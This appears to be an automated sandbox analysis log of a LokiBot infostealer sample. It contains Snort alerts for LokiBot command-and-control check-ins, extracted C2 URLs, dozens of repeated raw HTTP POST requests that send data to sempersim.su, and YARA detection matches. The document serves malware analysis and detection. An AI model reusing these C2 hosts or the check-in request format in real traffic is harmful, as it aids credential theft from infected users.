                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49799
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:61497 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49800 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49800 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49800 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49800 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49800 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49800
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:57890 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49801 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49801 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49801 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49801 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49801 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49801
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:55142 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49802 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49802 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49802 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49802 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49802 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49802
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:64948 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49808 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49808 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49808 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49808 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49808 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49808
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:60418 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49809 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49809 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49809 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49809 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49809 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49809
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:64259 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49810 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49810 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49810 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49810 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49810 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49810
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:61068 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49812 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49812 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49812 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49812 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49812 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49812
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:58715 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49813 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49813 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49813 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49813 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49813 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49813
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:57816 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49814 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49814 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49814 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49814 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49814 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49814
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:51787 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49815 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49815 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49815 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49815 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49815 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49815
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:53916 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49816 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49816 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49816 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49816 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49816 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49816
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:60790 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49818 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49818 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49818 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49818 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49818 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49818
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:62708 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49819 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49819 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49819 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49819 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49819 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49819
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:60946 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49820 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49820 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49820 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49820 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49820 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49820
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Joe Sandbox ViewASN Name: RACKTECHRU RACKTECHRU
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 163Connection: close
                Source: dhGoVvfmul.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: dehbibhar.exe, 00000002.00000002.519843236.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://sempersim.su/gf3/fre.php
                Source: dehbibhar.exe, dehbibhar.exe, 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, dehbibhar.exe, 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: unknownHTTP traffic detected: POST /gf3/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1234DF8CContent-Length: 190Connection: close
                Source: unknownDNS traffic detected: queries for: sempersim.su
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_00404ED4 recv,2_2_00404ED4
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056A8

                System Summary

                barindex
                Source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.dehbibhar.exe.9e0000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.dehbibhar.exe.9e0000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
